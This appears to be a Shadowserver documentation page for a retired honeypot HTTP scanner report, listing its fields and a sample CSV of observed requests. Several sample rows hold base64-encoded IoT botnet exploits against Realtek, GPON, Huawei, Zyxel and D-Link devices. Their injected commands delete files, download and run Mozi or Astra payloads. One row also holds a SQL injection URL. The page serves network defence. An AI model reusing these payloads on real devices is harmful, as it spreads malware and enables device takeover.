LEGACY: HTTP Scanners Report

LAST UPDATED: 2021-06-07

LEGACY REPORT

Report discontinued. Replaced by: Honeypot HTTP Scanner Events Report.

This report identifies hosts that have been observed performing HTTP-based scanning activity, including exploitation attempts.

HTTP scanning may be a benign activity — for example, it may be a search engine indexing the web, a research project, or an organization like the Shadowserver Foundation looking for open or vulnerable services that it can report to National CERTs and network owners so that they can remediate their networks.

Other scans, however, may be part of a network reconnaissance in the preparatory phase of an attack or exploit attempts coming from a botnet that is actively looking to infect new sites or devices. Popular targets include various IoT or VPN devices and CMS systems.

The HTTP report type, originally introduced as part of the EU Horizon 2020 SISSDEN Project has been extended under the INEA CEF VARIoT project.

It now features detailed information on attacks observed against HTTP honeypots, including CVE , CVSS score, MITRE ATT&CK tactic and technique mappings, affected product information and other exploit information that can be associated with the collected HTTP requests.

Please note this report will be replaced after 2021-06-01 by Honeypot HTTP Scanner Events Report.

Fields

timestamp

Time that the scan was performed in UTC+0
ip

The IP address performing the scan
port

The source port used in the scan
asn

ASN announcing the scanning IP
geo

Country where the scanning IP resides
region

State / Province / Administrative region where the scanning IP resides
city

ASN of where the scanning IP resides
hostname

PTR record of the scanning IP
type

Type of activity observed; i.e. http-scan
dst_ip

The IP address of the target device
dst_port

Destination port used in the scan
dst_asn

ASN announcing the target IP
dst_geo

Country where the target IP resides
dst_dns

FQDN of the target, if applicable and recorded
naics

North American Industry Classification System Code of the scanning IP
sic

Standard Industrial Classification System Code of the scanning IP
sector

Sector to which the attacking IP belongs
dst_sector

Sector to which the target IP belongs
public_source

Source of the data, for cases where the source accepts being credited
sensorid

ID of sensor target device
pattern

Request pattern if recognized by target sensor (e.g., does it match an RFI, LFI, SQLi … )
url

URL being requested by the scanning IP
file_md5

MD5 hash of file downloaded, if any
file_sha256

SHA256 hash of file downloaded, if any
request_raw

Raw request sent by the scanning IP (may be base64 encoded depending on reporting honeypot type)
tag

Array of additional tags, such as iot, vpn for better attack description
agent

User agent of request
url_scheme

Whether HTTP or HTTPS request
http_request_method

HTTP request method (GET, POST, HEAD ...)
session_tags

Array of additional tags describing attack characteristics, example: pre-auth;remote-code-execution
vulnerability_enum

Vulnerability or exploit schema being used, for example CVE or EDB
vulnerability_id

Id of vulnerability or exploit, for example CVE-2020-5902
vulnerability_class

If set, then CVSS
vulnerability_score

CVSS base score
vulnerability_severity

CVSS severity, for example, CRITICAL or HIGH
vulnerability_version

CVSS version of framework used, for example 3.1 or 3.0
threat_framework

Set to MITRE ATT&CK
threat_tactic_id

Array of tactic ids, example TA0001;TA0002
threat_technique_id

Array of technique ids, example T1190;T1059
target_vendor

Vendor that is being targeted, example Linksys
target_product

Product that is being targeted, example Linksys E-Series
target_class

Class of device/software being targeted, for example router
body_raw

Raw body request (may be base64 encoded depending on reporting honeypot type)

Sample

timestamp,ip,port,asn,geo,region,city,hostname,type,dst_ip,dst_port,dst_asn,dst_geo,dst_dns,naics,sic,sector,dst_sector,public_source,sensorid,pattern,url,file_md5,file_sha256,request_raw,tag,agent,url_scheme,http_request_method,session_tags,,vulnerability_id,vulnerability_class,vulnerability_score,vulnerability_severity,vulnerability_version,threat_framework,threat_tactic_id,threat_technique_id,target_vendor,target_product,target_class,body_raw
"2021-01-12 00:00:09",162.142.x.x,58188,398324,US,MICHIGAN,"ANN ARBOR",scanner-04.ch1.censys-scanner.com,http-scan,109.169.x.x,8010,25108,UK,,0,,"Information Technology",,,4cdd3e46-de80-40b4-9fbd-452312466a52,unknown,/,,,"GET / HTTP/1.1rnHost: 109.169.x.x:8010",,,,,,,,,,,,,,,,,,
"2021-01-12 00:00:10",167.248.x.x,40464,398722,US,MICHIGAN,"ANN ARBOR",,http-scan,145.220.x.x,9607,1101,NL,,0,,"Information Technology",,CAPRICA-EU,,,/,,,R0VUIC8gSFRUUC8xLjENCkhvc3Q6IDE0NS4yMjAueC54Ojk2MDcNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBDZW5zeXNJbnNwZWN0LzEuMTsgK2h0dHBzOi8vYWJvdXQuY2Vuc3lzLmlvLykNCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K,,"Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)",https,GET,,,,,,,,,,,,,,
"2021-01-12 00:00:12",71.6.x.x,43700,10439,US,CALIFORNIA,"SAN DIEGO",,http-scan,185.82.x.x,805,59729,BG,,0,,Communications,,CAPRICA-EU,,,/,,,R0VUIC8gSFRUUC8xLjENCkFjY2VwdC1FbmNvZGluZzogaWRlbnRpdHkNCkhvc3Q6IDE4NS44Mi54LngNCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS80MS4wLjIyMjguMCBTYWZhcmkvNTM3LjM2DQoNCg==,,"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",http,GET,,,,,,,,,,,,,,
"2021-01-12 19:54:26",125.25.x.x,58568,23969,TH,"KRUNG THEP MAHA NAKHON BANGKOK","BANG BON",,http-scan,213.183.x.x,49152,56630,RU,,517311,,Communications,,CAPRICA-EU,,,/soap.cgi?service=WANIPConn1,,,UE9TVCAvc29hcC5jZ2k/c2VydmljZT1XQU5JUENvbm4xIEhUVFAvMS4xDQpIb3N0OiAyMTMuMTgzLngueDo0OTE1Mg0KQ29udGVudC1MZW5ndGg6IDYzMA0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpTT0FQQWN0aW9uOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxI0FkZFBvcnRNYXBwaW5nDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogSGVsbG8sIFdvcmxkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCjw/eG1sIHZlcnNpb249IjEuMCIgPz48czpFbnZlbG9wZSB4bWxuczpzPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyIgczplbmNvZGluZ1N0eWxlPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VuY29kaW5nLyI+PFNPQVAtRU5WOkJvZHk+PG06QWRkUG9ydE1hcHBpbmcgeG1sbnM6bT0idXJuOnNjaGVtYXMtdXBucC1vcmc6c2VydmljZTpXQU5JUENvbm5lY3Rpb246MSI+PE5ld1BvcnRNYXBwaW5nRGVzY3JpcHRpb24+PE5ld1BvcnRNYXBwaW5nRGVzY3JpcHRpb24+PE5ld0xlYXNlRHVyYXRpb24+PC9OZXdMZWFzZUR1cmF0aW9uPjxOZXdJbnRlcm5hbENsaWVudD5gY2QgL3RtcDtybSAtcmYgKjt3Z2V0IGh0dHA6Ly8xOTIuMTY4LjEuMTo2MDE5Ny9Nb3ppLm07L3RtcC9Nb3ppLm0gZGxpbmtgPC9OZXdJbnRlcm5hbENsaWVudD48TmV3RW5hYmxlZD4xPC9OZXdFbmFibGVkPjxOZXdFeHRlcm5hbFBvcnQ+NjM0PC9OZXdFeHRlcm5hbFBvcnQ+PE5ld1JlbW90ZUhvc3Q+PC9OZXdSZW1vdGVIb3N0PjxOZXdQcm90b2NvbD5UQ1A8L05ld1Byb3RvY29sPjxOZXdJbnRlcm5hbFBvcnQ+NDU8L05ld0ludGVybmFsUG9ydD48L206QWRkUG9ydE1hcHBpbmc+PFNPQVBFTlY6Qm9keT48U09BUEVOVjplbnZlbG9wZT4NCg0K,iot,"Hello, World",http,POST,remote-code-execution;pre-auth;command-injection,,CVE-2014-8361,,,,,"MITRE ATT&CK",TA0001;TA0002,T1190;T1059,Realtek,"Realtek SDK",embedded-firmware,PD94bWwgdmVyc2lvbj0iMS4wIiA/PjxzOkVudmVsb3BlIHhtbG5zOnM9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIiBzOmVuY29kaW5nU3R5bGU9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW5jb2RpbmcvIj48U09BUC1FTlY6Qm9keT48bTpBZGRQb3J0TWFwcGluZyB4bWxuczptPSJ1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxIj48TmV3UG9ydE1hcHBpbmdEZXNjcmlwdGlvbj48TmV3UG9ydE1hcHBpbmdEZXNjcmlwdGlvbj48TmV3TGVhc2VEdXJhdGlvbj48L05ld0xlYXNlRHVyYXRpb24+PE5ld0ludGVybmFsQ2xpZW50PmBjZCAvdG1wO3JtIC1yZiAqO3dnZXQgaHR0cDovLzE5Mi4xNjguMS4xOjYwMTk3L01vemkubTsvdG1wL01vemkubSBkbGlua2A8L05ld0ludGVybmFsQ2xpZW50PjxOZXdFbmFibGVkPjE8L05ld0VuYWJsZWQ+PE5ld0V4dGVybmFsUG9ydD42MzQ8L05ld0V4dGVybmFsUG9ydD48TmV3UmVtb3RlSG9zdD48L05ld1JlbW90ZUhvc3Q+PE5ld1Byb3RvY29sPlRDUDwvTmV3UHJvdG9jb2w+PE5ld0ludGVybmFsUG9ydD40NTwvTmV3SW50ZXJuYWxQb3J0PjwvbTpBZGRQb3J0TWFwcGluZz48U09BUEVOVjpCb2R5PjxTT0FQRU5WOmVudmVsb3BlPg0KDQo=
"2021-01-12 23:42:33",178.72.x.x,2779,44257,RU,"TYUMENSKAYA OBLAST",TYUMEN,,http-scan,195.238.x.x,8080,39260,RO,,811212,,,,CAPRICA-EU,,,/GponForm/diag_Form?images/,,,UE9TVCAvR3BvbkZvcm0vZGlhZ19Gb3JtP2ltYWdlcy8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMTo4MDgwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdDogKi8qDQpVc2VyLUFnZW50OiBIZWxsbywgV29ybGQNCkNvbnRlbnQtTGVuZ3RoOiAxMTgNCg0KWFdlYlBhZ2VOYW1lPWRpYWcmZGlhZ19hY3Rpb249cGluZyZ3YW5fY29ubGlzdD0wJmRlc3RfaG9zdD1gYDt3Z2V0K2h0dHA6Ly8xOTIuMTY4LjEuMTo4MDg4L01vemkubSstTystPi90bXAvZ3BvbjgwODA7c2grL3RtcC9ncG9uODA4MCZpcHY9MA==,iot,"Hello, World",http,POST,remote-code-execution;pre-auth;command-injection,,CVE-2018-10562,CVSS,9.8,Critical,3.0,"MITRE ATT&CK",TA0001;TA0002,T1190;T1059,Dasan,"Dasan GPON Home Router",router,WFdlYlBhZ2VOYW1lPWRpYWcmZGlhZ19hY3Rpb249cGluZyZ3YW5fY29ubGlzdD0wJmRlc3RfaG9zdD1gYDt3Z2V0K2h0dHA6Ly8xOTIuMTY4LjEuMTo4MDg4L01vemkubSstTystPi90bXAvZ3BvbjgwODA7c2grL3RtcC9ncG9uODA4MCZpcHY9MA==
"2021-01-12 23:42:40",223.149.x.x,11923,4134,CN,"HUNAN SHENG",HUAIHUA,,http-scan,159.100.x.x,7574,203833,DE,,517311,,Communications,"Information Technology",CAPRICA-EU,,,/UD/act?1,,,UE9TVCAvVUQvYWN0PzEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMTo3NTc0DQpVc2VyLUFnZW50OiBIZWxsbywgd29ybGQNClNPQVBBY3Rpb246IHVybjpkc2xmb3J1bS1vcmc6c2VydmljZTpUaW1lOjEjU2V0TlRQU2VydmVycw0KQ29udGVudC1UeXBlOiB0ZXh0L3htbA0KQ29udGVudC1MZW5ndGg6IDY0MA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiPz48U09BUC1FTlY6RW52ZWxvcGUgeG1sbnM6U09BUC1FTlY9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIiBTT0FQLUVOVjplbmNvZGluZ1N0eWxlPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VuY29kaW5nLyI+PFNPQVAtRU5WOkJvZHk+PHU6U2V0TlRQU2VydmVycyB4bWxuczp1PSJ1cm46ZHNsZm9ydW0tb3JnOnNlcnZpY2U6VGltZToxJnF1IG90Oz48TmV3TlRQU2VydmVyMT5gY2QgL3RtcCAmJiBybSAtcmYgKiAmJiAvYmluL2J1c3lib3ggd2dldCBodHRwOi8vMTkyLjE2OC4xLjE6ODA4OC9Nb3ppLm0gJiYgY2htb2QgNzc3IC90bXAvdHIwNjQgJiYgL3RtcC90cjA2NCB0cjA2NGA8L05ld05UUFNlcnZlcjE+PE5ld05UUFNlcnZlcjI+YGVjaG8gREVBVEhgPC9OZXdOVFBTZXJ2ZXIyPjxOZXdOVFBTZXJ2ZXIzPmBlY2hvIERFQVRIYDwvTmV3TlRQU2VydmVyMz48TmV3TlRQU2VydmVyND5gZWNobyBERUFUSGA8L05ld05UUFNlcnZlcjQ+PE5ld05UUFNlcnZlcjU+YGVjaG8gREVBVEhgPC9OZXdOVFBTZXJ2ZXI1PjwvdTpTZXROVFBTZXJ2ZXJzPjwvU09BUC1FTlY6Qm9keT48L1NPQVAtRU5WOkVudmVsb3BlPg==,iot,"Hello, world",http,POST,remote-code-execution;pre-auth,,CVE-2016-10372,CVSS,9.8,Critical,3.0,"MITRE ATT&CK",TA0001,T1190,Zyxel,"Eir D1000 modem",modem,PD94bWwgdmVyc2lvbj0iMS4wIj8+PFNPQVAtRU5WOkVudmVsb3BlIHhtbG5zOlNPQVAtRU5WPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyIgU09BUC1FTlY6ZW5jb2RpbmdTdHlsZT0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvc29hcC9lbmNvZGluZy8iPjxTT0FQLUVOVjpCb2R5Pjx1OlNldE5UUFNlcnZlcnMgeG1sbnM6dT0idXJuOmRzbGZvcnVtLW9yZzpzZXJ2aWNlOlRpbWU6MSZxdSBvdDs+PE5ld05UUFNlcnZlcjE+YGNkIC90bXAgJiYgcm0gLXJmICogJiYgL2Jpbi9idXN5Ym94IHdnZXQgaHR0cDovLzE5Mi4xNjguMS4xOjgwODgvTW96aS5tICYmIGNobW9kIDc3NyAvdG1wL3RyMDY0ICYmIC90bXAvdHIwNjQgdHIwNjRgPC9OZXdOVFBTZXJ2ZXIxPjxOZXdOVFBTZXJ2ZXIyPmBlY2hvIERFQVRIYDwvTmV3TlRQU2VydmVyMj48TmV3TlRQU2VydmVyMz5gZWNobyBERUFUSGA8L05ld05UUFNlcnZlcjM+PE5ld05UUFNlcnZlcjQ+YGVjaG8gREVBVEhgPC9OZXdOVFBTZXJ2ZXI0PjxOZXdOVFBTZXJ2ZXI1PmBlY2hvIERFQVRIYDwvTmV3TlRQU2VydmVyNT48L3U6U2V0TlRQU2VydmVycz48L1NPQVAtRU5WOkJvZHk+PC9TT0FQLUVOVjpFbnZlbG9wZT4=
"2021-01-12 23:43:47",111.88.x.x,60843,132165,PK,"SINDH - SOUTH",KARACHI,,http-scan,138.186.x.x,37215,27796,PA,,0,,Communications,"Information Technology",CAPRICA-EU,,,/ctrlt/DeviceUpgrade_1,,,UE9TVCAvY3RybHQvRGV2aWNlVXBncmFkZV8xIEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogNDMwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQ6ICovKg0KQXV0aG9yaXphdGlvbjogRGlnZXN0IHVzZXJuYW1lPSJkc2xmLWNvbmZpZyIsIHJlYWxtPSJIdWF3ZWlIb21lR2F0ZXdheSIsIG5vbmNlPSI4ODY0NWNlZmIxZjllZGUwZTMzNmUzNTY5ZDc1ZWUzMCIsIHVyaT0iL2N0cmx0L0RldmljZVVwZ3JhZGVfMSIsIHJlc3BvbnNlPSIzNjEyZjg0M2E0MmRiMzhmNDhmNTlkMmEzNTk3ZTE5YyIsIGFsZ29yaXRobT0iTUQ1IiwgcW9wPSJhdXRoIiwgbmM9MDAwMDAwMDEsIGNub25jZT0iMjQ4ZDFhMjU2MDEwMDY2OSINCg0KPD94bWwgdmVyc2lvbj0iMS4wIiA/PjxzOkVudmVsb3BlIHhtbG5zOnM9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIiBzOmVuY29kaW5nU3R5bGU9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW5jb2RpbmcvIj48czpCb2R5Pjx1OlVwZ3JhZGUgeG1sbnM6dT0idXJuOnNjaGVtYXMtdXBucC1vcmc6c2VydmljZTpXQU5QUFBDb25uZWN0aW9uOjEiPjxOZXdTdGF0dXNVUkw+JCgvYmluL2J1c3lib3ggd2dldCAtZyAxMjcuMC4wLjEgLWwgL3RtcC9za2VyZSAtciAveDsgL2Jpbi9idXN5Ym94IGNobW9kIDc3NyAqIC90bXAvc2tlcmU7IC90bXAvc2tlcmUgZHVja3lzKTwvTmV3U3RhdHVzVVJMPjxOZXdEb3dubG9hZFVSTD4kKGVjaG8gSFVBV0VJVVBOUCk8L05ld0Rvd25sb2FkVVJMPjwvdTpVcGdyYWRlPjwvczpCb2R5PjwvczpFbnZlbG9wZT4NCg0K,iot,,http,POST,remote-code-execution;pre-auth,,CVE-2017-17215,CVSS,8.8,High,3.0,"MITRE ATT&CK",TA0001;TA0002,T1190;T1059,Huawei,"Huawei Home Gateway HG532",router,PD94bWwgdmVyc2lvbj0iMS4wIiA/PjxzOkVudmVsb3BlIHhtbG5zOnM9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW52ZWxvcGUvIiBzOmVuY29kaW5nU3R5bGU9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3NvYXAvZW5jb2RpbmcvIj48czpCb2R5Pjx1OlVwZ3JhZGUgeG1sbnM6dT0idXJuOnNjaGVtYXMtdXBucC1vcmc6c2VydmljZTpXQU5QUFBDb25uZWN0aW9uOjEiPjxOZXdTdGF0dXNVUkw+JCgvYmluL2J1c3lib3ggd2dldCAtZyAxMjcuMC4wLjEgLWwgL3RtcC9za2VyZSAtciAveDsgL2Jpbi9idXN5Ym94IGNobW9kIDc3NyAqIC90bXAvc2tlcmU7IC90bXAvc2tlcmUgZHVja3lzKTwvTmV3U3RhdHVzVVJMPjxOZXdEb3dubG9hZFVSTD4kKGVjaG8gSFVBV0VJVVBOUCk8L05ld0Rvd25sb2FkVVJMPjwvdTpVcGdyYWRlPjwvczpCb2R5PjwvczpFbnZlbG9wZT4NCg0K
"2021-01-12 23:35:12",198.251.x.x,57020,8560,US,PENNSYLVANIA,WAYNE,,http-scan,104.168.202.24,80,54290,US,,0,,"Information Technology","Commercial Facilities",CAPRICA-EU,0307847c-448d-4931-a2d7-6441d0b918bc,sqli,"/default.php?destino=999999.9'+%2f**%2fuNiOn%2f**%2faLl+%2f**%2fsElEcT+0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39+and+'0'='0",,,"POST /default.php?destino=999999.9'+%2f**%2fuNiOn%2f**%2faLl+%2f**%2fsElEcT+0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39+and+'0'='0 HTTP/1.1rnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rnAccept-Encoding: gzip, deflaternConnection: ClosernContent-Length: 0rnContent-Type: application/x-www-form-urlencodedrnHost: tyderq.usrnReferer: http://tyderq.us/default.php?destino=999999.9'+%2f**%2fuNiOn%2f**%2faLl+%2f**%2fsElEcT+0x393133353134353632312e39,0x393133353134353632322e39,0x393133353134353632332e39+and+'0'='0rnUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)",,,,,,,,,,,,,,,,,,
"2021-01-12 23:51:21",39.83.x.x,55018,4837,CN,"SHANGHAI SHI",HUANGPU,,http-scan,185.17.x.x,8081,20860,UK,,517311,,Communications,,CAPRICA-EU,,,/HNAP1/,,,UE9TVCAvSE5BUDEvIEhUVFAvMS4wDQpDb250ZW50LVR5cGU6IHRleHQveG1sOyBjaGFyc2V0PSJ1dGYtOCINClNPQVBBY3Rpb246IGh0dHA6Ly9wdXJlbmV0d29ya3MuY29tL0hOQVAxL2BjZCAvdG1wICYmIHJtIC1yZiAqICYmIHdnZXQgaHR0cDovLzE5Mi4xNjguMS4xL2JpbnMvQXN0cmEubWlwcyAmJiBjaG1vZCAreCBBc3RyYS5taXBzOyAuL0FzdHJhLm1pcHMgaG5hcC5yZXBgDQpDb250ZW50LUxlbmd0aDogNjQwDQoNCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+PHNvYXA6RW52ZWxvcGUgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYS1pbnN0YW5jZSIgeG1sbnM6eHNkPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYSIgeG1sbnM6c29hcD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvc29hcC9lbnZlbG9wZS8iPjxzb2FwOkJvZHk+PEFkZFBvcnRNYXBwaW5nIHhtbG5zPSJodHRwOi8vcHVyZW5ldHdvcmtzLmNvbS9ITkFQMS8iPjxQb3J0TWFwcGluZ0Rlc2NyaXB0aW9uPmZvb2JhcjwvUG9ydE1hcHBpbmdEZXNjcmlwdGlvbj48SW50ZXJuYWxDbGllbnQ+MTkyLjE2OC4wLjEwMDwvSW50ZXJuYWxDbGllbnQ+PFBvcnRNYXBwaW5nUHJvdG9jb2w+VENQPC9Qb3J0TWFwcGluZ1Byb3RvY29sPjxFeHRlcm5hbFBvcnQ+MTIzNDwvRXh0ZXJuYWxQb3J0PjxJbnRlcm5hbFBvcnQ+MTIzNDwvSW50ZXJuYWxQb3J0PjwvQWRkUG9ydE1hcHBpbmc+PC9zb2FwOkJvZHk+PC9zb2FwOkVudmVsb3BlPg0KDQo=,iot,,http,POST,remote-code-execution;pre-auth;command-injection,,CVE-2015-2051,,,,,"MITRE ATT&CK",TA0001;TA0002,T1190;T1059,D-Link,"D-Link DIR-645, DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR",router,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c29hcDpFbnZlbG9wZSB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4bWxuczpzb2FwPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9zb2FwL2VudmVsb3BlLyI+PHNvYXA6Qm9keT48QWRkUG9ydE1hcHBpbmcgeG1sbnM9Imh0dHA6Ly9wdXJlbmV0d29ya3MuY29tL0hOQVAxLyI+PFBvcnRNYXBwaW5nRGVzY3JpcHRpb24+Zm9vYmFyPC9Qb3J0TWFwcGluZ0Rlc2NyaXB0aW9uPjxJbnRlcm5hbENsaWVudD4xOTIuMTY4LjAuMTAwPC9JbnRlcm5hbENsaWVudD48UG9ydE1hcHBpbmdQcm90b2NvbD5UQ1A8L1BvcnRNYXBwaW5nUHJvdG9jb2w+PEV4dGVybmFsUG9ydD4xMjM0PC9FeHRlcm5hbFBvcnQ+PEludGVybmFsUG9ydD4xMjM0PC9JbnRlcm5hbFBvcnQ+PC9BZGRQb3J0TWFwcGluZz48L3NvYXA6Qm9keT48L3NvYXA6RW52ZWxvcGU+DQoNCg==

Our 131 Report Types

« Back to Network Reporting